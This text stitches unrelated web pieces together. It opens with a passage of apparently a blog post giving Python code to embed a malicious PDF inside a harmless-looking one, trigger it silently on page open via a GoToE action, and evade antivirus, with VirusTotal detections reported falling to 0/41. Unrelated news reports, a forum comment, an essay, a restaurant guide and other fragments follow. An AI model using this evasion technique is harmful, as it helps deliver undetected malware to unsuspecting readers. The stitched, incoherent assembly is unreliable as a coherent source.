If this entry is present , the Type entry is required and the file specification dictionary shall be indirectly referenced .
The F and UF entries should be used in place of the DOS , Mac , or Unix entries .
So , my version of the FileSpec dictionary follows .
We need a dictionary containing a subset of the keys F , UF , DOS , Mac , and Unix , corresponding to the entries by those names in the file specification dictionary .
And then put that under the EF tag in the Filespec dictionary .
Damn !
This is confusing .
Basically we need a dictionary that looks like this …
<< /F N 0 R >>
Where “ N 0 R ” refer to the embedded File Stream object .
Here you have the code ..
embeddedlst = PDFDict ( )
embeddedlst.add(‘F’ , PDFRef( embedded ) )
Let ’s construct the actual Filespec dictionary .
Note that I ’ve hardcoded the name to ‘ file.pdf ’ and that this should be revisited if we are trying to embed more than one file .
filespec = PDFDict ( )
filespec.add(‘ Type ’, PDFName(‘ Filespec’ ) )
filespec.add(‘ F’ , PDFString(‘ file.pdf ’ ) )
filespec.add(‘EF ’ , embeddedlst )
doc.add( filespec )
Excelent !!
We are getting closer to the ultimate PDF hider !!
The Filespec dictionary will have this look ..
M 0 obj << / Type / Filespec /F ( file.pdf ) /EF << /F N 0 R >> >> endobj
(3) Now we need to build the Embedded Files list .
That ’s easy , just build a dictionary that has a Names tag .
Then put an array of pairs mapping an utf - 16 encoded name to the filespec dictionary .
In few words it should be something like this …
<< / Names [ < fffe610074007400610063006800 > M 0 R ] >>
… where < fffe610074007400610063006800 > is the utf - 16 PDFHexString of the string “ attach ” and “ M 0 R ” is a reference to the filespec dictionary .
names = PDFDict ( )
names.add(‘ EmbeddedFiles ’, namesToFiles )
And then just add the names dictionary to the document and reference it from the Catalog .
And the code will be similar to this …
namesToFiles = PDFDict ( )
namesToFiles.add(‘ Names ’ , PDFArray ( [ PDFHexString (‘attach’.encode ( ‘utf - 16 ’ ) ) , PDFRef( filespec ) ] ) )
(4) And finally we put it under the global names list in the Catalog .
We create the Names dictionary and add it to the document …
names = PDFDict ( )
doc.add ( names )
… then add the EmbeddedFiles entry as stated in PDF3200:1008.1::7.7.4 ( Name Dictionary ) .
And finally link it from the Catalog .
names.add(‘ EmbeddedFiles ’, namesToFiles )
catalog.add ( ‘ Names ’ , PDFRef ( names ) )
WE HAVE EMBEDDED A FILE !!!
The yet incomplete PDF with an embedded file containing “ AAAA ” is demostrated here , an it actually have something under the ‘ paper clip ’ , check it out …
II ) Jump to the embedded PDF with GoToE
Now than we have added an embedded pdf to a pdf we ’ll want to jump to it without user intervention and ( why not ) without javascript .
For this we ’ll set up a GoToE action and link it to the OpenAction or some other trigger dictionary in the document .
An action dictionary defines the characteristics and behaviour of an action , and it is described in PDF3200:1008.1::12.6.2 ( Action Dictionaries ) .
Embedded go - to actions give a complete facility for linking between a file in a hierarchy of nested embedded files and another file in the same or different hierarchy .
The GoToE action is described in PDF3200:1008.1::12.6.4.4 ( Embedded Go-To Actions ) , but basically they have this look …
<< /S / GoToE /T <</N <fffe610074007400610063006800 > /R /C / NewWindow false >> / NewWindow false >>
… where the N tag refers to the utf - 16 encoded name of the embedded file .
The code for this action follows .
action = PDFDict ( )
action.add(‘S’ , PDFName(‘ GoToE ’ ) )
action.add(‘ NewWindow’ , PDFBool ( False ) )
action.add(‘T’ , PDFDict ( {‘ N’ : name , ‘ R’ : PDFName (‘ C’ ) , ‘ NewWindow ’ : PDFBool ( False ) } ) )
doc.add ( action )
Setting the NewWindow tag to True or False may change how the reader opens the hided file .
Funny things may happen when run from inside a browser (! ) .
OK , all we have left is linking this action to some trigger that would n’t call the user attention .. well we have OpenAction but let ’s try something a lil different now .
Let ’s put one of those AA trigger dictionaries to our single dummy page on the host pdf .
That ’s done with something like this …
page.add(‘ AA ’ , PDFDict ( {‘ O’ : PDFRef ( action ) } ) )
And finally render it out to stdout …
print doc #:)
And as we expect the pdf to hide in hte parameters .. we can use it like this …
python embeddPDF.pdf evil.pdf > goodness.pdf
For a quick look on a representative sample of this code check here .
III )
The virustotal.com test
It ’s time for the virustotal .com test .
I ’ll try to hide the evilness of some PDF embedding it into one of our hosts PDF , as described previously , and see what happens .
I ’m tired so I ’ll pick one not - so - evil pdf I got from my previous post .
So I got this pdf which is a small pdf with a javascrip openaction featuring an obcene heap spray usually easily detected by AVs .
That gave this result on virustotal.com , a 14 over 41 score .
Now lets embed it by our embeddPDF .
py … I got this pdf .
And when pass it to virustotal .com it got detected by 2 of 41 AVs .
Here you have the result .
Damn !
0 out of 41 seems to be hard to get .
Let ’s try it again but this time using the obfuscated miniPDF .
py version piled on the embeddPDF .
py .
I got this pdf .
I passed it to virustotal … and got
- danger - !!
0/41 !! - danger -
No AV have detected it !!
I suppose there are 1 mill ways to accomplish this but it still feels g00d !
The results here .
A complete test bundle with most of the code is here .
f /
UPDATE ( 5:19 AM Jan 17th ) ::
Nice !
We had an improvement !
Now detected in 3/41 AVs .
http://bit.ly/8Xabw4.
Glenn Cameron ( left ) and John Twomey are accused of armed robbery Four men have appeared in court in the first crown court criminal trial to be held without a jury in England and Wales for more than 350 years .
The case concerns four men accused of a £ 1.75 m armed robbery at a cash depot at Heathrow Airport , west London , in 2004 .
Last June , Lord Chief Justice Lord Judge made legal history by allowing the trial to be heard by a judge alone as he feared jury " tampering " .
One of the accused men's barristers said : " We are breaking history . "
John Twomey , 61 , of New Milton , Hampshire , Barry Hibberd , 43 , of Shepherd 's Bush , west London , Peter Blake , 57 , of Notting Hill , west London , and Glen Cameron , 50 , also from New Milton , all deny several charges including robbery and firearm possession .
AT THE SCENE By Margaret Ryan , BBC News , Royal Courts of Justice , London
Those at the first crown court criminal trial without jury in England and Wales for more than 350 years were acutely aware of its significance .
Sam Stein QC talked of " breaking history " .
The wooden benches in courtroom 35 remained empty of the usual 12 ordinary men and women of the jury .
Mr Justice
Treacy asked that normal procedure be adapted to allow him to decide whether the four defendants were guilty .
They sat in front of those empty jury benches , listening impassively to the prosecution case .
The public gallery was only half full in this impressive courtroom , in an annexe to the courts which conjures images of Harry Potter 's Hogwarts school .
Outside , supporters of the accused protested at the " kangaroo court " .
Inside , business continued .
It may lack the drama of a case which will culminate in a jury - delivered verdict but nonetheless it was well worth a ringside seat for such a departure from legal history .
Debating non-jury criminal trial
It is the fourth trial connected to the robbery .
As the trial began Sam Stein QC , representing Mr Hibberd , remarked : " We are breaking history .
This is the first time that a court has started a jury - less trial . "
As prosecution barrister Simon Russell Flint QC was about to open the case , the judge explained how he had decided to adapt the normal procedure by which juries are given responsibility for a case .
" At this stage the defendants would have been put in the charge of the jury and , although it is not apparently a strict legal requirement that they are , " he said .
" I have asked the court clerk to adapt the normal formula and to put me in charge of the various counts on the indictment . "
Instead of reading out all 18 charges as she would have done to the jury , the clerk simply asked the judge to confirm he had seen the indictment .
She then informed the judge the defendants had pleaded not guilty and that it was in his charge to say whether they were guilty or not - the task usually given to jurors .
' Professionally executed '
The court heard how the gang of armed robbers tried to steal more than £ 10 m from a warehouse at Heathrow Airport .
But there was only £ 1.75 m there at the time , as one of the gang members had misunderstood a document , said Mr Russell Flint .
" This was a professionally - planned and professionally - executed armed robbery , " he said .
BBC legal affairs analyst Clive Coleman said trial by jury was a hallowed principle stretching back to the Magna Carta in 1215 .
But he said if - as Lord Judge found in this case - there was a real and present danger of jury tampering , which could not reasonably be protected against , trial by jury was limited by recent legislation .
In June , Lord Judge said the cost of the measures such as the services of police officers needed to protect jurors from potential influence was too high .
Supporters of the defendants protested outside court
He also said that such measures might not properly insulate the jury .
The trial will be the first crown court case in England and Wales to be heard by a judge alone , using powers under Sections 44 and 46 of the Criminal Justice Act 2003 that came into force in July 2007 .
Trials without a jury are a more regular feature of justice elsewhere in the UK .
Diplock courts have been used in Northern Ireland since 1973 in an effort to combat jury intimidation by paramilitary groups .
But in June 2009 , Justice Minister Paul Goggins said the system would only be retained for two more years .
And some criminal cases in Scotland are heard by a sheriff in the sheriff court or by a bench of one or more lay justices , in justice of the peace courts .
As the trial began at the Royal Courts of Justice , a group of friends and supporters of the defendants protested outside .
Brian O'Callaghan , a family friend of John Twomey , said : " We are doing this so that a democracy does n't turn into a dictatorship . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
A scientific group led by the Translational Genomics Research Institute ( TGen ) have identified three kinases , or proteins , that dismantle connections within brain cells , which may lead to memory loss associated with Alzheimer 's disease .
These findings , the results of a multi- year TGen study , are published in this month 's edition of BMC Genomics in a paper titled : High - content siRNA screening of the kinome identifies kinases involved in Alzheimer 's disease - related tau hyperphosphorylation .
The three kinases were found to cause a malfunction in tau , a protein critical to the formation of the microtubule bridges within brain cells , or neurons .
These bridges support the synaptic connections that , like computer circuits , allow neurons to communicate with each other .
" The ultimate result of tau dysfunction is that neurons lose their connections to other neurons , and when neurons are no longer communicating , that has profound effects on cognition -- the ability to think and reason , '' said Dr. Travis Dunckley , an Associate Investigator in TGen 's Neurodegenerative Research Unit and the scientific paper 's senior author .
Tau performs a critical role in the brain by helping bind together microtubules , which are sub - cellular structures that create scaffolding in the neurons , allowing them to stretch out along bridges called axons .
The axons support the synaptic , or chemical , connections with other neurons .
Under normal circumstances , kinases regulate tau by adding phosphates .
This process , called tau phosphorylation , enables the microtubules to unbind and then bind again , allowing brain cells to connect and reconnect with other brain cells .
advertisement
" That facilitates synaptic plasticity .
It facilitates the ability of people to form new memories -- to form new connections between different neurons -- and maintain those memories .
So , it 's an essential function , '' Dr. Dunckley said .
However , sometimes the tau protein becomes hyperphosphorylated , a condition in which the tau creates neurofibrillary tangles , one of the signature indicators of Alzheimer's .
" When tau protein is hyperphosphorylated , the microtubule comes apart -- basically destroying that bridge -- and the neurons can no longer communicate with each other , '' Dr. Dunckley said .
TGen investigators created sophisticated tests to look at all 572 known and theoretical kinases within human cells .
They identified 26 associated with the phosphorylation of tau .
Of these 26 , three of them -- EIF2AK2 , DYRK1A and AKAP13 -- were found to cause hyperphosphorylation of tau , permanently dismantling the microtubule bridges .
" This paper shows , for the first time , these three kinases affect Alzheimer 's disease - relevant tau hyperphosphorylation , in which most of the tau protein is now driven into a permanently phosphorylated form , '' Dr. Dunckley said .
advertisement
Dr. Eric Reiman , clinical director of TGen 's Neurogenomics Division and executive director of the Banner Alzheimer 's Institute , explained that tau holds together the skeleton inside neurons .
When phosphate molecules stick to tau proteins , the skeleton falls apart and the neurons begin to retract their synaptic branches and die , leading to memory loss and thinking problems .
In this study , researchers used a molecular tool called siRNA to screen the entire human genome , said Dr. Reiman , a co-author of the scientific paper .
This tool enabled the TGen - led team to discover which proteins , when genetically turned off , prevent phosphate molecules from sticking to tau .
The three kinases , or proteins , that appear to contribute to the formation of brain tangles , can now be targeted by protein - inhibitor drugs .
" This study used a powerful tool to discover three proteins that may be involved in tangle formation .
If safe and well - tolerated tangle - busting medications can be developed , they offer great promise in the treatment of Alzheimer 's disease , '' said Dr. Reiman , who also is Director of the Arizona Alzheimer 's Consortium .
The next step will be to identify drug compounds that can negate the effects of the three kinases linked to tau hyperphosphorylation .
" The reason that we did this study was to identify therapeutic targets for Alzheimer 's disease , whereby we could modify the progression of tau pathology , '' Dr. Dunckley said .
" This was a screen to identify what the relevant targets are .
Now , we want to match those targets to treatments . ''
TGen 's collaborators in the study included : the Department of Neurology at the Mayo Clinic in Jacksonville , Fla. ; the Center for Alzheimer 's Research at the Sun Health Institute in Sun City , Ariz . ; Banner Alzheimer 's Institute in Phoenix , Ariz . ; the Department of Psychiatry at the University of Arizona ; and the Arizona Alzheimer 's Consortium , a group of nine institutes that cooperatively study Alzheimer 's disease .
One of the most adored home consoles of all time unfortunately had one of the most spectacular burn - outs .
But even in its comparatively short time in active production , the Sega Dreamcast managed a respectable library of software : many titles therein later becoming some of the biggest cult hits in the industry ’s history .
Its no surprise then , that the top brass at Sega , including Chairman Isao Okawa , attempted to keep the catalog on life support through any means necessary .
Recently revealed through Kotaku was one of the more surprising efforts on Sega ’s part , a plan to include Dreamcast compatibility with the original Xbox .
Many termed Microsoft ’s first effort in the console market as the Dreamcast ’s “ spiritual successor , ” so the prospective collaboration is n’t completely out of reasonable bounds .
A tweet from former Microsoft executive Sam Furakawa confirmed Sega ’s efforts , stating that “ Before Mr. Okawa passed away , he visited [ Bill ]
Gates several times , to see if it would be possible to add Dreamcast compatibility into the Xbox . ”
Being one of the first systems to support internet - based multiplayer on multiple AAA titles , Microsoft ’s Xbox Live would have been a natural progression for Sega ’s intentions with the Dreamcast , and the compatibility would have no doubt aided Microsoft ’s sales in Japan – to date the company ’s weakest region .
But due to Microsoft ’s desire to keep Live play limited to their own titles , negotiations were quick to fall apart before a deal could be reached .
Would the addition of Dreamcast compatibility have made the Xbox a more attractive console ?
Would it have aided either company ?
Give us your own Elder - Geek thoughts below !
Wanklage
Wanklage
Posted Jan 4 , 2010 22:16 UTC
( Mon ) by ( subscriber , # 165 ) Parent article : A summary of 2009 Perl 6 activity
It appears that Perl may be turning into a wanklage .
A wanklage is most typically a language for which there is more enthusiasm in discussions of how it may be implemented than in what new programs and libraries can be written in it .
( Well - known wanklages include Lisp and Haskell . )
Enthusiasts of wanklages are frequently more interested in how cool various features are than in how useful they may be in writing real programs .
Currying is one such feature .
Another mark of a wanklage is long discussions of how to overcome its built - in impediments to solving simple problems .
Use " wanklage " in a sentence today .
Wage and benefit costs , both before and after adjusting for inflation , grew more slowly 2009 than any year since the U.S. government began tracking data in 1982 as double - digit unemployment weakened workers ’ ability to command higher pay .
Over the past 12 months , the cost of wages and benefits for workers other than those employed by the federal government rose 1.5 % , according to the Labor Department ’s employment cost index .
Over the same period , consumer prices rose 2.7 % .
Adjusted for inflation , wages and benefits fell by 1.3 % after rising by 2.8 % in 2008 , the first year of the recession .
The inflation - adjusted cost of wages and benefits at the end of 2009 stood just 1.1 % higher than at the end of the previous recession in 2001 , the Labor Department said .
The Employment Cost Index measures of the cost of labor free from the influence of changes in compensation caused when high - wage sectors grow more – or less — rapidly than low - wage sectors .
Unlike widely cited data on wages , the index includes the cost of benefits , which account for about 30 % of total compensation costs .
Before adjusting for inflation , the index rose 0.5 % in the fourth quarter , slightly higher than the 0.4 % increase in third quarter .
“ The weak labor market will help keep inflationary pressures benign , said economist Anika Khan of Wells Fargo Securities .
“ As such , the Federal Reserve continues to have the flexibility to keep short - term interest rates at the current level . ”
State and local government workers ’ compensation in 2009 grew by 2.4 % , twice the pace of the 1.2 % increases in the private sector .
State and local government employees compensation has outpaced private - sector increases for the past several years .
Private employers ’ health insurance costs rose 4.4 % in 2009 , after increasing by 3.5 % the year before .
The 2009 increase , though , was the second lowest rate of increase in more than a decade , according to the survey .
The Labor Department noted that that this reflects , in part , employers ’ reducing their contributions to employees ’ health insurance or switching to lower - cost health plans .
It added that the data in this part of its quarterly survey is n’t as reliable as the rest of the report .
By Chris Hogg
BBC News , Shanghai
The Chinese government is offering incentives to homebuyers
China 's city governments and ministries have been told to build more low cost housing .
They have also been ordered to push property developers to complete projects more quickly in order to help ease property prices .
The directive has come from the country 's cabinet , the State Council , amid fears of a property bubble .
It also says it wants to prevent speculative foreign investment pushing up prices even further .
China 's leaders are worried that house prices in many cities here are rising too fast now .
Hot money
If too many Chinese are priced out of the market , it could stir economic and social instability .
Last year China 's banks issued $ 1.5 trillion ( £ 932 bn ) worth of new loans to help ease the country through the financial crisis .
It is thought around a sixth of the total flowed into the property sector and there are some here who worry it is now overheating .
The new directive from the State Council sets out measures to try to increase the supply of smaller , cheaper homes for families on low incomes .
It also urges financial institutions to promote measures that encourage first time buyers but discourage those who want to purchase a second home for investment purposes .
It says there should be a crackdown on property developers who hoard land to try raise prices in an area .
And it wants to stop so called " hot money " from flowing into the country .
This is cash from foreign investors who see the rising prices here as an opportunity to make money .
Indulge me to dredge up the most obscure foreign conflict in American history — the long - forgotten War of 1812 — to illustrate my provocative point :
When your mortal enemy , the Leviathan state , starts a war , you had better think twice about fulfilling your supposed " patriotic " duty by marching off to battle .
And Libertarians ( to their credit ) have basically figured out this scam well ahead of everybody else and that , while only a fool defends his country , a wise man defends himself .
Let me elaborate .
Do the math : 1812 was a leap year that featured a presidential election .
The Fourth Chief Executive , James Madison , who , as a young man basically wrote the United States Constitution , twenty - five years later was up for reelection while presiding over a failed administration .
And after dominating the national government in Washington for a dozen years , the early Republican Party ( which changed its name to Democrat a decade later ) had evidently worn out its welcome .
A fusion ticket of opposition Federalists and disaffected Northern Republicans nominated a formidable challenger — DeWitt Clinton of New York  the man who later , as Governor of the Empire State , would prove instrumental in the construction of the Erie Canal .
So in the same spirit as the fanciful 1997 movie classic , Wag the Dog , Madison and his Republican Party contrived to wage a war against Britain as the centerpiece of their reelection campaign strategy .
For a swift military strike to capture lightly defended Canada would presumably rally the voters behind the incumbent in time for the Fall 1812 balloting .
Wag the Dog ( New Line ... Best Price : $ 3.99 Buy New $ 9.99 ( as of 10:15 EST - Details )
Meanwhile , the election battlelines were clearly drawn .
The popular New Yorker Clinton was bound to carry the North while the Virginian Madison would capture the South and West .
Like the 2000 Bush - Gore contest that revolved around one key state — remember Florida and the infamous " hanging chads "  the 1812 struggle boiled down to the swing state of Pennsylvania .
Naturally , Madison ultimately carried Pennsylvania , thus reassuring his reelection , which you doubtless already knew since in school you never learned about any President named DeWitt Clinton .
But had the challenger actually carried the Keystone State , the Federalist / Dissident Republican ticket would have secured the election in a squeaker .
Now comes the fun part : The Congress ' War Declaration directed against Britain , which passed by a party vote in June 1812 , was so transparently motivated by partisan politics that some New England businessmen privately approached London with a curious , if admittedly , “ treasonous ” offer .
The anti-Madison North could continue its brisk trade with its prime customer and supplier while Britain , for its part , would wage war only against the bottom half of the United States .
In fact , many northerners considered their real " enemy " to be , not the British ( the now officially - designated national adversary ) , but rather the scheming Republican Party politicians like Madison who had initiated a needless foreign struggle as part of their cynical , self - serving reelection campaign strategy .
Was the conduct of Madison 's opponents " treason " or merely the justifiable pursuit of their own self - interest ?
Elsewhere , not to be outdone in the “ treason ” department , Madison , who must have read Article 3 Section 3 of the U.S. Constitution that defines “ treason " as giving " aid and comfort " to our nation 's wartime enemy — after all , Madison basically crafted the document — astutely recognized that he would lose the Presidency without carrying Pennsylvania , which was full of voting farmers who anticipated selling part of their fall harvest to the British .
Madison thus permitted grain shipments to continue as usual !
In fact , Madison ’s campaign supporters emphasized that , despite the Declaration of War on Britain and the launching of the American invasion of Canada ( an expedition which failed miserably ) , Republicans had no intention of interfering with the farmers ’ profits !
Two years hence , a British strike force ( fed with Pennsylvania grain ) sailed up the Chesapeake and burned Washington D.C. forcing Madison to flee from his own capital city .
The Pentagon Papers Fox Butterfield Best Price : $ 4.00 Buy New $ 952.95 ( as of 11:35 EST - Details )
It was knowledge such as this that I absorbed as a youthful UCLA History Ph.D. candidate many moons ago that served to stimulate my lifelong interest in identifying the root cause of war .
And so did Daniel Ellsberg 's shocking 1971 disclosure of the Pentagon Papers , which chronicled how American leaders had repeatedly lied to the public in pursuit of their own political agenda all the while exhorting our boys to fight and die for their “ country . ”
A subsequent January 1973 epiphany — that all wars must be so driven — altered the course of my life forever .
In hindsight , I experienced what the late - historian of science , Thomas Kuhn , would call a " paradigm flash " — it was Kuhn himself who popularized the notion of a " paradigm shift . "
And it was Kuhn who , although I never met him personally , did exchange several letters with me back during the 1980s , which furnished crucial assistance to me for placing my often disjointed thoughts in proper perspective .
After receiving my doctorate in 1979 , I quickly surveyed the historic record and discovered that we could identity approximately 300 - or - so wars stretching back from Greco - Roman times to the present day that yield sufficient data regarding the decision - making process to permit the diligent researcher to play Sherlock Holmes .
In this fashion , I would be able to test my hunch that all wars were the result of leaders ' cynical , self - serving political manipulation .
Through careful analysis , these 300 - odd authentic historical cases can furnish enough information to : ( 1 ) recreate the intellectual and bureaucratic framework in existence at that crucial moment , ( 2 ) identify the key decision - making elite who held the authority to make war , ( 3 ) explore the institutional and bureaucratic framework in which each particular decision for war was reached , ( 4 ) reconstruct the exact sequence of events that led to the decision for war having been taken , ( 5 ) discover the ostensible " reason " being served up for public consumption , and ( 6 ) recount what these key decision - making elites admitted privately amongst themselves regarding the real " reason " ( the " hidden agenda , " if you will ) for their own conflict .
Only in this comprehensive manner will scholars be able finally to answer satisfactorily the age - old question : " Why war ? "
My mammoth research effort has taken far longer than I could have ever imagined .
And I 'm still years away from publication of my data .
In the meantime , I have decided to make public my findings .
Check out my website — www.worldwidewarproject.org — for a preview of things to come .
When I embarked on my ambitious project three decades ago , I had intended that I would eventually make contact with numerous world - class scholars , who would be able to validate my thesis regarding their own particular area of historical expertise .
I had initially anticipated corresponding with recognized experts by snail mail .
But in the interim , thank God , Al Gore invented the Internet !
Thus my newly - constructed website — www.worldwidewarproject.org — now features hundreds of postings ( soon to be a full thousand ) from world - class historians confirming my theories .
Finally , although my website is still very much a work - in - progress — I 've only managed to post responses for the first third of my 300 - or - so case studies — I expect that you will find my research provocative and enlightening , as well as sending a clear message to any future James Madisons : " Be warned !
I 'm hip to your nasty political tricks and I 'm always watching you . "
December 8 , 2009
The Best of Jonathan M. Kolkey
On their new album , The Majestics show their willingness to venture outside traditional reggae and roll with the punches thrown by COVID - 19 .
Restaurant Week Guide
Devoted foodies and restaurant newbies love Foobooz .
Sign up now for our twice weekly newsletter .
BY BRIDGET SALMONS
Restaurant Week 2010 kicks off this coming Sunday ( and runs two weeks , from the 17th through the 22nd and 24th through 29th ) with three - course lunches for $ 20 and three - course dinners for $ 35 .
If I had the time , money , and metabolism to do it , I might just fill an entire week with these discounted eats .
A foodie can dream , right ?
MONDAY
Lunch at Lacroix .
Here are chef Jason Cichonski ’s main course offerings : halibut with whipped potatoes and pork belly ; lamb meatballs with wild mushrooms , and braised chickpeas with grilled almonds and smoked raisins —
I might have to take a half - day after a lunch this decadent .
Dinner at Chifa .
Spotted on Chifa ’s RW menu : a new item from chef Jose Garces — pho , with rice noodles , beef tenderloin , and jalapeño !
TUESDAY
Lunch at Buddakan .
The RW bento box is back , with 17 first - course dishes to mix and match ( my order : miso soup , hoisin - glazed pork belly , veggie fried rice ) , plus three choices for dessert ( obviously , I ’ll take the carrot cake with layers of panna cotta filling ) .
Dinner at Friday Saturday Sunday .
Perfect for a date night .
Plus , FSS has all of its best dishes on offer : the rich and earthy cream of mushroom soup , the poached asparagus with tomato vinaigrette , the grilled filet mignon with burgundy wild mushroom and leek sauce .
WEDNESDAY
Lunch at Butcher & Singer .
It ’s the perfect midweek pick - me - up : the Best Of Philly winning Butcher burger .
Plus a classic Caesar or shrimp cocktail to start , and baked Alaska or chocolate fudge cake for dessert .
Dinner at Audrey Claire .
After an admittedly heavy lunch , a lighter dinner is in order .
Luckily any of Audrey Claire ’s seasonal offerings ( brussels sprouts with shaved parmesan , bosc pear and gorgonzola flatbread , potato - crusted ahi tuna with crispy beets ) will do the trick .
THURSDAY
Lunch at Noble American Cookery .
You know a restaurant ’s crafted a darn good RW menu when you have trouble deciding between just two options for each course .
The sure - to - be- inventive soup of the day or Noble ’s Caesar with eggless anchovy vinaigrette ?
The pulled pork with Texas toast or crabcake with zucchini / jalapeño emulsion ?
Decisions , decisions .
Dinner at Novita Bistro .
Note :
Go with a sharer .
Choosing between the traditional Moroccan chicken tagine and the wild mushroom ravioli in that luscious demiglace is next to impossible .
You really must try both .
FRIDAY
Lunch at Zahav .
Lunch starts with the hummus and salads , followed by your choice of one mezze plate and one skewer , then dessert .
Luckily , you really can’t choose wrongly at Zahav — but I might offer a bit of dessert advice : the salty / sweet / chewy pine nut tart really should n’t be missed .
Dinner at R2L .
The perfect way to get acquainted with chef Daniel Stern ’s new restaurant at the top of Two Liberty .
Here are the Sternian dishes that caught my eye : cheese risotto with a soy sabayon , chichen daube ( stew ) with anchoiade ( anchovy puree ) , and “ Mom ’s sour cream and walnut apple pie . ”
( Note : R2L is scheduled to open on the 21st . )
Do n't you hate it when you can't get that pesky alien implant out of your groin ?
Dr. Roger Leir is here to help .
Advertisement
Dr. Leir , a major player in the world of UFO research , will be appearing as a special guest at an event in Burbank on Sunday February 7 .
The gathering at Pickwick Gardens also include Jordan Maxwell ( " a preeminent researcher and speaker in the fields of secret societies , occult philosophies , and ufology since 1959 , " according to the man 's website ) giving lectures on " The Hidden Dimensions in World Affairs . "
( Both seem to be friends to the Forteans . )
This youtube video of Dr. Leir 's 2009 speech before the International UFO Congress will give you a sense of his style .
" Yes , abductees do get implants , " the man introducing Leir to the group points out sternly .
" And yes , Dr. Leir has removed a lot of them .
It 's getting serious guys — he 's made some absolutely extraordinary findings . "
Advertisement
Part of what 's interesting about Dr. Leir is that he 's down - to - earth , matter - of - fact , empirically scientific in his storytelling — kind of ... dull .
As one commenter notes alongside the video :
if you could afford to fake his surgeries ( which you can watch ) and pay him enough to lie , i think they would have paid off someone with more charisma like obama , someone who can really keep your interest , it doesnt seem logical to use someone so boring to listen﻿ to convince the masses of such an important issue .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Who can argue with that ?
Either way , we will see ya there - if THEY do n't get us first .
MOUNTAIN VIEW , California ( Reuters ) - Google
Inc took the wraps off a new smartphone that it will sell directly to consumers , aiming to boost its position in the emerging mobile Internet market by exerting greater control over the new generation of Web - surfing devices .
The sleek touchscreen phone , dubbed the Nexus One , is Google ’s boldest foray outside its traditional Internet home turf and represents the first time the 11 - year - old company will sell a consumer electronics device bearing its well - known brand .
But analysts say the phone is not as revolutionary in design as Apple Inc ’s iPhone was .
Tech websites and forums gave Google favorable reviews but also noted the new phone was not that different from others in the market that run Google ’s Android software , such as Motorola ’s Droid .
The Nexus One ships immediately and exclusively from Google ’s online store for $ 179 with a two - year contract from Deutsche Telekom ’s T - Mobile USA , or $ 529 without a service plan .
The more expensive unlocked phone , analysts say , is priced too high to dramatically alter the relationship between carriers and hardware vendors in which wireless service providers have traditionally controlled handset distribution in the U.S .
It “ was n’t the game - changer people thought it could be , ” Canaccord Adams analyst Jeff Rath said .
Google could have shaken up the industry by offering the device for free , but instead chose more traditional pricing , he said .
( For Reuters Insider coverage see link.reuters.com/wek89g )
Executives said the phone could be profitable for Google , though analysts are not forecasting a revenue windfall in the short term .
But the move , which Google announced at a press event at its Mountain View , California headquarters on Tuesday , raises the stakes in the fast - growing smartphone business which it entered two years ago by developing the free Android software for smartphones made by other companies .
Slideshow ( 18 images )
The highly anticipated Nexus One , which Google designed in close collaboration with hardware maker HTC , could provide Google with a viable challenge to the iPhone and Research in Motion ’s BlackBerry .
Google ’s decision to sell its own Google - branded phones is “ a sea change in terms of Google now owning the customer , making the carrier a little bit less relevant to the conversation and maintaining more control over the hardware and software experience because they realize they ’re competing with players like Apple and the iPhone , ” said Michael Gartenberg , vice president of strategy and analysis at market research firm Interpret .
The Nexus One is the first of a variety of smartphones that Google said were in the pipeline as the company seeks to expand its reach from the PC to the mobile world and ensure its online products and ads get prominent placement on a new breed of wireless Internet devices .
Executives said that in the spring Google will sell phones that use Verizon Wireless ’s network in the United States and Vodafone ’s in Europe .
Verizon Wireless is a joint venture between Verizon Communications and Vodafone .
WAIT AND SEE
According to Forrester research , 17 percent of U.S. mobile phone users had smartphones at the end of 2009 , up from 11 percent a year earlier .
Investors are taking a wait - and - see view on Google ’s first effort to sell a hardware product directly to consumers .
Google ’s stock has risen about 7 percent since the start of December , setting a 52 - week high of $ 629.51 on Monday .
But analysts say that was driven by improvements in its core business of Internet search advertising , rather than the prospect of tapping a new pool of revenue selling smartphones .
Slideshow ( 18 images )
Its shares closed 0.44 percent down at $ 623.99 .
Google executives declined to provide financial targets for the new phone , though Vice President of Engineering Andy Rubin said the company would not lose money by selling the phone .
By selling the phone directly to consumers , Rubin said that Google would be able to cut out extra retailing costs and ultimately deliver phones with lower price tags .
“ There ’s a lot of people in the value chain who do n’t need to be there , ” said Rubin .
“ And then prices can go down , iteration can happen quicker , distribution can be wider . ”
Some analysts were positive on Google ’s effort to continue to establish the Android as a popular operating system for smartphones and wireless devices .
“ It will help them keep consistency for Android platform , ” said Jim McGregor , Chief Technology Strategist for In - Stat .
The new phone helps Google “ get their partners all on developing a single platform that applications can be developed on . ”
The Nexus One is 11.5 millimeters ( 0.5 inch ) thick and weighs 130 grams ( 4.6 ounces ) -- which executives said was lighter than a Swiss Army knife and no thicker than a No. 2 pencil .
The phone will feature a 3.7 - inch ( 9.4 centimeter ) touchscreen display .
It will run the 2.1 version of the Android operating system and feature OLED display technology , a trackball for user interface control , an accelerometer chip , and a 5 megapixel camera .
Forrester analyst Charles Golvin said the Nexus One was an impressive looking device , even if it does n’t represent the kind of “ quantum leap ” forward in terms of technology as the iPhone did when it was first released in 2007 .
Google worked closely with HTC to develop its phone , which uses a 1 gigahertz Snapdragon processor from Qualcomm Inc .
Motorola , which is banking on the Android system to power a new generation of smartphones to revitalize a flagging business , said it welcomed the competition .
Co -Chief Executive Sanjay Jha told Google ’s audience he did not see the Nexus One as a threat , but as an expansion of the market .
Both can be bypassed by smart attackers who know they ’re being profiled .
Both have moderate success in catching less - dedicated attackers .
You should n’t think either is a defense by itself .
Despite their weaknesses , they are still an essential part of a security program .
In other words , both security layers are worthwhile , but they both also become dangerous when their effectiveness is overestimated . ::
Conan O'Brien introduced the Bugatti Veyron Mouse as a new Tonight Show character Thursday night , not because it was funny , but because it was " crazy expensive " for NBC .
To be funny he'd have to crash it into a lake .
UPDATED !
Advertisement
UPDATE : You do n't just find a Bugatti Veyron while stumbling about on the street like a late night talk show host with a microphone searching for blondes .
Curious where Conan O'Brien found the Bugatti Veyron for the sketch ?
Advertisement
UPDATE 2 : Good thing you came here to watch this clip .
If you went to Hulu or NBC.com you 'd find Jeff Zucker 's pulled the clip out of the " full episode " just like he pulled the rug out from under Top Gear USA .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
UPDATE 3 : It turns out we were right all along , Conan 's Veyron Mouse was loaned to the show by the Petersen Museum .
you guys moderate comments carefully ?
